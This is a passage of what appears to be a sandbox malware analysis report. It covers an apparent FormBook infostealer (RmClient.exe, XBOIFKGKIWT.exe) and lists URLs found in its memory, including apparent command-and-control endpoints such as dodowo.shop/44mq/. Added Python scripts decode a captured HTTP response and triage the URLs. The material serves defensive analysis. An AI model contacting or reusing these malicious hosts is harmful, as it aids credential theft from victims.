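"""
import re

HEAD_HEX = (
    "32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 "
    "46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e "
    "0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e "
    "3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 "
    "6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a "
)
PADDING_HEX = (
    "3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 "
    "61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 "
    "2d 2d 3e 0d 0a "
)
TAIL_HEX = "0d 0a 30 0d 0a 0d 0a"  # CRLF closing the data chunk, then the zero-length last-chunk
DATA_RAW = HEAD_HEX + PADDING_HEX * 6 + TAIL_HEX


def hexdump_to_bytes(dump):
    """Space-separated hex, as in the report's 'Data Raw' field, to bytes."""
    return bytes.fromhex("".join(dump.split()))


def dechunk(raw):
    """Walk HTTP/1.1 chunked framing: size line, data, CRLF, ..., '0' CRLF CRLF.

    Returns (body, chunk_sizes). Raises ValueError on a truncated or malformed
    stream so an incomplete capture is never mistaken for a complete response.
    Trailer fields are not supported (none occur in this capture).
    """
    body, sizes, pos = bytearray(), [], 0
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("chunk-size line not terminated")
        # The size field may carry ';ext=value' chunk extensions; drop them.
        size = int(raw[pos:eol].split(b";", 1)[0].strip(), 16)
        sizes.append(size)
        pos = eol + 2
        if size == 0:
            if raw[pos:pos + 2] != b"\r\n":
                raise ValueError("missing final CRLF after last-chunk")
            return bytes(body), sizes
        chunk = raw[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated chunk: expected %d bytes, got %d" % (size, len(chunk)))
        if raw[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        body += chunk
        pos += size + 2


def is_complete(dump):
    """True if the dump decodes as a well-formed, fully captured chunked body."""
    try:
        dechunk(hexdump_to_bytes(dump))
        return True
    except ValueError:
        return False


def summarize(dump):
    """Facts an analyst wants from the response: framing, length, page title, server."""
    body, sizes = dechunk(hexdump_to_bytes(dump))
    text = body.decode("utf-8", errors="replace")
    title = re.search(r"<title>(.*?)</title>", text)
    return {
        "chunk_sizes": sizes,
        "body_len": len(body),
        "title": title.group(1) if title else None,
        "server_banner": "nginx" if "<center>nginx</center>" in text else None,
        "padding_comments": text.count("<!-- a padding to disable MSIE and Chrome friendly error page -->"),
        "printable": text.replace("\r\n", ""),  # what the report renders as 'Data Ascii'
    }


if __name__ == "__main__":
    for key, value in summarize(DATA_RAW).items():
        print("%-17s %s" % (key, value if key != "printable" else value[:80] + "..."))
```

                The same routine can be pointed at any other Data Raw field in the report. A cut-off capture raises ValueError rather than yielding a partial body, which matters when deciding whether a C2 response was received in full.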
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Ambrosia.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HT
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Cousins.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTj
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Lucinda.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTj
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Pieces.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTjn
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/September.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3H
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/display.cfm
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004010000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003550000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://dodowo.shop/44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUo
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Deacapalla.online
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.deacapalla.online/__media__/design/underconstructionnotice.php?d=deacapalla.online
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.deacapalla.online/__media__/js/trademark.php?d=deacapalla.online&type=ns
                Source: XBOIFKGKIWT.exe, 00000008.00000002.4014572631.0000000004C99000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.infovea.tech
                Source: XBOIFKGKIWT.exe, 00000008.00000002.4014572631.0000000004C99000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.infovea.tech/3irn/
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004334000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003874000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://joker.com/?pk_campaign=Parking&pk_kwd=text
                Source: RmClient.exe, 00000006.00000002.4010464904.000000000278B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: RmClient.exe, 00000006.00000002.4010464904.000000000278B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: RmClient.exe, 00000006.00000003.2788289756.000000000773C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: RmClient.exe, 00000006.00000002.4010464904.000000000278B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: RmClient.exe, 00000006.00000002.4010464904.000000000278B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: RmClient.exe, 00000006.00000002.4010464904.000000000278B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: RmClient.exe, 00000006.00000002.4010464904.000000000278B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
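                The memory strings above come from several distinct sources: HTML fetched from parked or placeholder domains (the loopia.se/loopia.com assets, the i4.cdn-image.com "netsol-logos" images of a Network Solutions parking page, joker.com, consentmanager), Chrome's default search-engine definitions (ecosia, duckduckgo, yahoo, google) and Outlook's login.live.com OAuth endpoints read while harvesting browser and mail data, and two URLs with a short random directory (dodowo.shop/44mq/, www.infovea.tech/3irn/) that fit the URL shape FormBook panels are known for. The script below is an added example, not part of the report. Its triage rules are assumptions: the host lists are what the author of this example treats as parking-page, browser or Microsoft infrastructure, and the short-directory regex is a heuristic, not a FormBook signature. The input lines are copied from the report; several are truncated at the report's column limit, which is why only host and path are classified.

```python
"""Group the report's 'String found in binary or memory' URLs by host and triage them.

Added example, not part of the Joe Sandbox report. Host lists and the short-directory
heuristic are this example's assumptions, not sandbox signatures.
"""
import re
from urllib.parse import urlsplit

# Lines copied from the report (constructed input for this example; the report truncates
# long URLs, so some query strings end mid-value).
REPORT_LINES = """\
Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Ambrosia.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HT
Source: RmClient.exe, 00000006.00000002.4012231174.0000000004010000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003550000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://dodowo.shop/44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUo
Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Deacapalla.online
Source: XBOIFKGKIWT.exe, 00000008.00000002.4014572631.0000000004C99000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.infovea.tech
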